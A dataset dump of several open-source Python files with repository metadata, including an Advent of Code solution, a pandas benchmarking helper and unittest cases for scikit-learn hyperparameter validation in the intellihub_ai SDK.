| 24.285714 | 42 | 0.629412 | 29 | 170 | 3.689655 | 0.689655 | 0.11215 | 0.149533 | 0.186916 | 0.261682 | 0.261682 | 0 | 0 | 0 | 0 | 0 | 0.205674 | 0.170588 | 170 | 6 | 43 | 28.333333 | 0.553191 | 0.929412 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d946161641476112516351e1e744f12db21b12a5 | 140 | py | Python | PensePython.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | PensePython.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | PensePython.py | erikamaylim/Python-CursoemVideo | 5a6809818c4c55a02ec52379d95f3d20c833df2e | [
"MIT"
] | null | null | null | '''matriz = []
for i in range(3):
linha = []
for j in range(3):
linha.append(0)
matriz.append(linha)
print(matriz)'''
| 14 | 24 | 0.535714 | 20 | 140 | 3.75 | 0.55 | 0.186667 | 0.213333 | 0.346667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029703 | 0.278571 | 140 | 9 | 25 | 15.555556 | 0.712871 | 0.942857 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d95cb479fdbef85d43006be9775724b0dc1be570 | 46 | py | Python | models/ops/depthavgpooling/functions/__init__.py | E18301194/DepthAwareCNN | 8ae98f7f18b69f79e7df03397dec2543d3d0c8eb | [
"MIT"
] | 278 | 2018-05-09T03:08:56.000Z | 2022-03-10T08:05:10.000Z | models/ops/depthavgpooling/functions/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 35 | 2018-05-31T15:42:44.000Z | 2022-03-17T09:36:13.000Z | models/ops/depthavgpooling/functions/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 80 | 2018-06-03T10:04:48.000Z | 2022-03-05T12:57:31.000Z | from .depthavgpooling import depth_avgpooling
| 23 | 45 | 0.891304 | 5 | 46 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 46 | 1 | 46 | 46 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d97c485e85e00287f5e5c1cd6f7ba7de1763b87c | 1,085 | py | Python | Day3/day3.2.py | akashvacher/AdventOfCode2021 | 8d1429c0cc33cf67f84097b38fb01f02e69c1717 | [
"MIT"
] | null | null | null | Day3/day3.2.py | akashvacher/AdventOfCode2021 | 8d1429c0cc33cf67f84097b38fb01f02e69c1717 | [
"MIT"
] | null | null | null | Day3/day3.2.py | akashvacher/AdventOfCode2021 | 8d1429c0cc33cf67f84097b38fb01f02e69c1717 | [
"MIT"
] | null | null | null | from collections import Counter
def part2():
all_lines = open("in.txt").read().splitlines()
# Get oxygen_rating
lines = all_lines[:]
i = 0
while len(lines) > 1:
bits = Counter(line[i] for line in lines)
if bits["1"] >= bits["0"]:
lines = [line for line in lines if line[i] == "1"]
elif bits["1"] < bits["0"]:
lines = [line for line in lines if line[i] == "0"]
i += 1
# There should only be one line remaining after pruning
assert len(lines) == 1
oxygen_rating = int(lines[0], 2)
# Get co2_rating
lines = all_lines[:]
i = 0
while len(lines) > 1:
bits = Counter(line[i] for line in lines)
if bits["1"] >= bits["0"]:
lines = [line for line in lines if line[i] == "0"]
elif bits["1"] < bits["0"]:
lines = [line for line in lines if line[i] == "1"]
i += 1
# There should only be one line remaining after pruning
assert len(lines) == 1
co2_rating = int(lines[0], 2)
print(oxygen_rating * co2_rating)
part2()
| 27.820513 | 62 | 0.546544 | 161 | 1,085 | 3.627329 | 0.242236 | 0.05137 | 0.092466 | 0.143836 | 0.791096 | 0.736301 | 0.736301 | 0.736301 | 0.736301 | 0.736301 | 0 | 0.038822 | 0.311521 | 1,085 | 38 | 63 | 28.552632 | 0.742972 | 0.129032 | 0 | 0.740741 | 0 | 0 | 0.019149 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.037037 | false | 0 | 0.037037 | 0 | 0.074074 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
79d16c2eb9c7d3f87d22b7251ff63aa2533bc83b | 80 | py | Python | tests/test_chardif.py | shaypal5/chardif | ae203a8dfecee3eaa82a76f59ec2799d27d2e107 | [
"MIT"
] | null | null | null | tests/test_chardif.py | shaypal5/chardif | ae203a8dfecee3eaa82a76f59ec2799d27d2e107 | [
"MIT"
] | null | null | null | tests/test_chardif.py | shaypal5/chardif | ae203a8dfecee3eaa82a76f59ec2799d27d2e107 | [
"MIT"
] | null | null | null | from chardif import chardif
def test_basic():
chardif("rabbit", "grabit")
| 13.333333 | 31 | 0.7 | 10 | 80 | 5.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175 | 80 | 5 | 32 | 16 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8de2206126f84c2301bea88c30822dc3f0179d11 | 99 | py | Python | app/main/__init__.py | jeantardelli/web-dev-flask | 20582ec5967094803625263177ba111580816cf9 | [
"MIT"
] | 1 | 2020-12-01T20:30:29.000Z | 2020-12-01T20:30:29.000Z | app/main/__init__.py | jeantardelli/web-dev-flask | 20582ec5967094803625263177ba111580816cf9 | [
"MIT"
] | null | null | null | app/main/__init__.py | jeantardelli/web-dev-flask | 20582ec5967094803625263177ba111580816cf9 | [
"MIT"
] | null | null | null | from flask import Blueprint
main_bp = Blueprint('main_bp', __name__)
from . import views, errors
| 16.5 | 40 | 0.767677 | 14 | 99 | 5 | 0.642857 | 0.371429 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 99 | 5 | 41 | 19.8 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0.070707 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
5c108ae14d6d2e310d97104f0f5c63fe43568030 | 4,021 | py | Python | tests/performance/timings.py | bhumikapahariapuresoftware/visions | 8838d89b4f02e401112378b4662a779227ead9f8 | [
"BSD-4-Clause"
] | 142 | 2020-01-07T21:17:10.000Z | 2022-03-30T13:10:14.000Z | tests/performance/timings.py | bhumikapahariapuresoftware/visions | 8838d89b4f02e401112378b4662a779227ead9f8 | [
"BSD-4-Clause"
] | 121 | 2020-01-07T02:26:38.000Z | 2022-03-29T17:18:19.000Z | tests/performance/timings.py | bhumikapahariapuresoftware/visions | 8838d89b4f02e401112378b4662a779227ead9f8 | [
"BSD-4-Clause"
] | 18 | 2020-02-17T03:17:37.000Z | 2022-02-20T14:01:11.000Z | import pandas as pd
from visions.utils.profiling import (
profile_relation_is_relation,
profile_relation_transform,
profile_type,
)
def performance_report(series_dict, convert_map, membership=True):
"""Relative performance benchmark for casting"""
performance_list = []
for type, _, series_names in convert_map:
if membership:
# True: "series in type"
test_series = {name: series_dict[name] for name in series_names}
else:
# False: "series in type"
test_series = {
name: s for s, name in series_dict.values() if name not in series_names
}
performance_list.extend(profile_type(type, test_series))
df = pd.DataFrame.from_records(performance_list)
df["type"] = df["type"].astype(str)
aggs = ["min", "max"]
agg_labels = ["worst", "best"]
summary_cols = ["series"] # , "big O"]
agg_df = df.groupby("type").agg(aggs).reset_index()[["type"] + summary_cols]
agg_df.columns = ["_".join(col).strip("_") for col in agg_df.columns]
colrenames = {
f"{name}_{agg}": f"{rename} {name}"
for name in summary_cols
for agg, rename in zip(aggs, agg_labels)
}
agg_df.rename(columns=colrenames, inplace=True)
df["normed run time"] = df["average run time"] / df["average run time"].min()
df = df.groupby("type")["normed run time"].describe().sort_values("50%")
df = pd.merge(df, agg_df, on="type", how="left")
return df
def get_relation(to_type, from_type):
return to_type.relations[from_type]
def relations_is_relation_test(series_dict, convert_map):
relation_tests = {
get_relation(*conversions[0:2]): conversions[2] for conversions in convert_map
}
performance_list = []
for relation, names in relation_tests.items():
test_series = {name: series_dict[name] for name in names}
performance_list.extend(profile_relation_is_relation(relation, test_series))
df = pd.DataFrame.from_records(performance_list)
grouper = "relation"
df[grouper] = df[grouper].astype(str)
aggs = ["min", "max"]
agg_labels = ["worst", "best"]
summary_cols = ["series"] # , "big O"]
agg_df = df.groupby(grouper).agg(aggs).reset_index()[[grouper] + summary_cols]
agg_df.columns = ["_".join(col).strip("_") for col in agg_df.columns]
colrenames = {
f"{name}_{agg}": f"{rename} {name}"
for name in summary_cols
for agg, rename in zip(aggs, agg_labels)
}
agg_df.rename(columns=colrenames, inplace=True)
df["normed run time"] = df["average run time"] / df["average run time"].min()
df = df.groupby(grouper)["normed run time"].describe().sort_values("50%")
df = pd.merge(df, agg_df, on=grouper, how="left")
return df
def relations_transform_test(series_dict, convert_map):
relation_tests = {
get_relation(*conversions[0:2]): conversions[2] for conversions in convert_map
}
performance_list = []
for relation, names in relation_tests.items():
test_series = {name: series_dict[name] for name in names}
performance_list.extend(profile_relation_transform(relation, test_series))
df = pd.DataFrame.from_records(performance_list)
grouper = "relation"
df[grouper] = df[grouper].astype(str)
aggs = ["min", "max"]
agg_labels = ["worst", "best"]
summary_cols = ["series"] # , "big O"]
agg_df = df.groupby(grouper).agg(aggs).reset_index()[[grouper] + summary_cols]
agg_df.columns = ["_".join(col).strip("_") for col in agg_df.columns]
colrenames = {
f"{name}_{agg}": f"{rename} {name}"
for name in summary_cols
for agg, rename in zip(aggs, agg_labels)
}
agg_df.rename(columns=colrenames, inplace=True)
df["normed run time"] = df["average run time"] / df["average run time"].min()
df = df.groupby(grouper)["normed run time"].describe().sort_values("50%")
df = pd.merge(df, agg_df, on=grouper, how="left")
return df
| 37.933962 | 87 | 0.647849 | 543 | 4,021 | 4.594843 | 0.160221 | 0.03006 | 0.026453 | 0.031263 | 0.803607 | 0.781964 | 0.766733 | 0.766733 | 0.766733 | 0.732265 | 0 | 0.003777 | 0.209898 | 4,021 | 105 | 88 | 38.295238 | 0.781555 | 0.030589 | 0 | 0.655172 | 0 | 0 | 0.102109 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045977 | false | 0 | 0.022989 | 0.011494 | 0.114943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5c3797af24bee679152d46c2aede4d14093d6f3b | 33 | py | Python | EditSQL/agent.py | Deliangus/MISP | 8632b5ea120f8385825a08eb930232d3ea74c426 | [
"MIT"
] | 54 | 2019-10-07T03:36:25.000Z | 2021-12-27T02:11:11.000Z | EditSQL/agent.py | Deliangus/MISP | 8632b5ea120f8385825a08eb930232d3ea74c426 | [
"MIT"
] | 1 | 2021-08-13T07:48:15.000Z | 2021-08-31T01:30:12.000Z | EditSQL/agent.py | Deliangus/MISP | 8632b5ea120f8385825a08eb930232d3ea74c426 | [
"MIT"
] | 4 | 2020-01-29T17:38:28.000Z | 2021-12-10T19:09:37.000Z | from MISP_SQL.agent import Agent
| 16.5 | 32 | 0.848485 | 6 | 33 | 4.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
30a7706c5a4286294883c9f973ea6201fa531094 | 68,119 | py | Python | test/ml_tests/test_scikit_algo_assertions.py | Spotflock/intellihub-sdk-python | 5b84e5477691c9ee38f994988ccd59155b7fdf64 | [
"MIT"
] | 2 | 2021-12-07T12:20:06.000Z | 2022-03-09T07:31:50.000Z | test/ml_tests/test_scikit_algo_assertions.py | Spotflock/intellihub-sdk-python | 5b84e5477691c9ee38f994988ccd59155b7fdf64 | [
"MIT"
] | null | null | null | test/ml_tests/test_scikit_algo_assertions.py | Spotflock/intellihub-sdk-python | 5b84e5477691c9ee38f994988ccd59155b7fdf64 | [
"MIT"
] | 1 | 2021-12-06T13:35:09.000Z | 2021-12-06T13:35:09.000Z | import unittest
import os
os.chdir(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from intellihub_ai.assertions import hyper_parameter_check
class TestScikitClassificationAlgo(unittest.TestCase):
def setUp(self):
self.library = "scikit"
self.service = "classification"
pass
# ------------- DECISION TREE --------------------
def test_decision_tree_1(self):
# default params
algorithm = "DecisionTrees"
params = {'ccp_alpha': 0.0,'class_weight': None,'criterion':'gini','max_depth': None,'max_features': None, 'max_leaf_nodes': None,'min_impurity_decrease': 0.0,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'splitter': 'best'}
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_2(self):
algorithm = "DecisionTrees"
params = {'ccp_alpha': 0.5,'criterion': 'gun'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_3(self):
algorithm = "DecisionTrees"
params = {'max_depth': 0.5,'max_features': 'gun','max_leaf_nodes': 1.0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_4(self):
algorithm = "DecisionTrees"
params = {'max_depth': 5,'max_features': 'gun','max_leaf_nodes': 2}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_5(self):
algorithm = "DecisionTrees"
params = {'min_impurity_decrease': -0.5,'min_samples_leaf': 'gun','min_samples_split': 1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_6(self):
algorithm = "DecisionTrees"
params = {'min_impurity_decrease': 0.5,'min_samples_leaf': 0.7,'min_samples_split': 1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_7(self):
algorithm = "DecisionTrees"
params = {'min_impurity_decrease': 0.5,'min_samples_leaf': 0.3,'min_samples_split': 1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_decision_tree_8(self):
algorithm = "DecisionTrees"
params = {'min_weight_fraction_leaf': 0.5,'splitter': 'best'}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- RANDOM FOREST -------------------- #
def test_random_forest_1(self):
algorithm = "RandomForest"
params = {'bootstrap': True, 'ccp_alpha': 0.0,'class_weight': None,'criterion': 'gini','max_depth': None,'max_features': 'auto','max_leaf_nodes': None,'max_samples': None,'min_impurity_decrease': 0.0,'min_impurity_split': None,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'n_estimators': 100,'n_jobs': None,'oob_score': False,'verbose': 0,'warm_start': False}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_2(self):
algorithm = "RandomForest"
params = {'bootstrap': "true", 'ccp_alpha': -2}#,'class_weight': None,'criterion': 'gini','max_depth': None,'max_features': 'auto','max_leaf_nodes': None,'max_samples': None,'min_impurity_decrease': 0.0,'min_impurity_split': None,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'n_estimators': 100,'n_jobs': None,'oob_score': False,'verbose': 0,'warm_start': False}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_3(self):
algorithm = "RandomForest"
params = {'class_weight': "random_value_cause_except",'criterion': 'gini','max_depth': 0.34}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_4(self):
algorithm = "RandomForest"
params = {'class_weight': "random_value_cause_except",'criterion': 'gini','max_depth': 3}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_5(self):
algorithm = "RandomForest"
params = {'max_features': 'random_value_cause_except','max_leaf_nodes': 1.5}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_6(self):
algorithm = "RandomForest"
params = {'max_features': 'random_value_cause_except','max_leaf_nodes': 3}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_7(self):
algorithm = "RandomForest"
params = {'min_impurity_decrease': 0.0,'min_impurity_split': None}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_8(self):
algorithm = "RandomForest"
params = {'min_impurity_decrease': 0.0,'min_impurity_split': -0.4}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_9(self):
algorithm = "RandomForest"
params = {'min_samples_leaf': -0.7,'min_samples_split': 0.5}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_10(self):
algorithm = "RandomForest"
params = {'n_estimators': -100}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_11(self):
algorithm = "RandomForest"
params = {'min_weight_fraction_leaf': 1,'n_estimators': 0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_random_forest_12(self):
algorithm = "RandomForest"
params = {'min_weight_fraction_leaf': 0.2,'n_estimators': 10}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- BAGGING -------------------- #
def test_bagging_1(self):
algorithm = "Bagging"
params = {'base_estimator': None, 'bootstrap': True, 'bootstrap_features': False, 'max_features': 1.0,'max_samples': 1.0,'n_estimators': 10,'n_jobs': None,'oob_score': False,'random_state': None,'verbose': 0, 'warm_start': False}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_2(self):
algorithm = "Bagging"
params = {'bootstrap': "false"}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_3(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_4(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': -30}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_5(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': 30, 'max_samples': "can_be_anything"}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_6(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': 30, 'max_samples': "can_be_anything",'n_estimators':-100}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_7(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': 30, 'max_samples': "can_be_anything",'n_estimators':100,'oob_score':"fas"}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_bagging_8(self):
algorithm = "Bagging"
params = {'bootstrap': False, 'bootstrap_features':True, 'max_features': 30, 'max_samples': "can_be_anything",'n_estimators':100,'oob_score':False}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- ExtraTrees -------------------- #
def test_extratrees_1(self):
algorithm = "ExtraTrees"
params = {'bootstrap': False,'ccp_alpha': 0.0,'class_weight': None,'criterion': 'gini','max_depth': None,'max_features': 'auto','max_leaf_nodes': None,'max_samples': None,'min_impurity_decrease': 0.0,'min_impurity_split':None,'min_samples_leaf': 1,'min_samples_split': 2,'min_weight_fraction_leaf': 0.0,'n_estimators': 100,'n_jobs': None,'oob_score': False,'random_state': None,'verbose': 0,'warm_start': False}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_2(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': -0.1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_3(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'ginient'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_4(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything'}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_5(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_6(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything"}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_7(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes': 2,
"max_samples": "canbeanything", "min_impurity_decrease": 0}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_8(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes': 2,
"max_samples": "canbeanything", "min_impurity_decrease": 1}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_9(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes': 2,
"max_samples": "canbeanything", "min_samples_leaf": 0.7}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_10(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "min_samples_split":0.2}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_11(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "min_weight_fraction_leaf":-0.3}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_12(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "min_samples_leaf":0.2}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_13(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "n_estimators":0.4}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_extratrees_14(self):
algorithm = "ExtraTrees"
params = {'ccp_alpha': 0.1, 'criterion': 'gini', 'max_features': 'canbeanything', 'max_leaf_nodes':2, "max_samples":"canbeanything", "min_samples_leaf":1,"n_estimators":300,"min_weight_fraction_leaf":0.3}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- KNN -------------------- #
def test_knn_1(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'auto', 'leaf_size': 30, 'metric': 'minkowski', 'metric_params': None, 'n_jobs': None, 'n_neighbors': 5, 'p': 2, 'weights': 'uniform'}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_2(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'randomname'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_3(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'kd_tree', 'leaf_size': -30}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_4(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'ball_tree', 'leaf_size': 30, 'metric': 'minkowski'}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_5(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'ball_tree', 'leaf_size': 30, 'metric':"chebyshev", 'metric_params': None,'n_neighbors': -5.0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_6(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'ball_tree', 'leaf_size': 30, 'metric':"chebyshev", 'metric_params': None,'n_neighbors': 5, 'p':1}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_knn_7(self):
algorithm = "KNearestNeighbour"
params = {'algorithm': 'ball_tree', 'leaf_size': 30, 'metric':"chebyshev", 'metric_params': None,'n_neighbors': 5, 'p':3}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- AdaBoost -------------------- #
def test_adaboost_1(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R','base_estimator': None,'learning_rate': 1.0,'n_estimators': 50,'random_state': None}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_2(self):
algorithm = "AdaBoost"
params = {'algorithm': 'afaSAMME.R'}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_3(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R','learning_rate': -1.0}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_4(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R','learning_rate': 1.0, 'n_estimators': 5.2}
# assertion should fail
self.assertFalse(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_5(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME.R','learning_rate': 1.0, 'n_estimators': 54}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
def test_adaboost_6(self):
algorithm = "AdaBoost"
params = {'algorithm': 'SAMME','learning_rate': 1.0, 'n_estimators': 54}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
# ------------- NaiveBayesMultinomial -------------------- #
def test_naivebayes_1(self):
algorithm = "NaiveBayesMultinomial"
params = {'alpha': 1.0, 'class_prior': None, 'fit_prior': True}
# assertion should fail
self.assertTrue(hyper_parameter_check(self.library, self.service, algorithm, params))
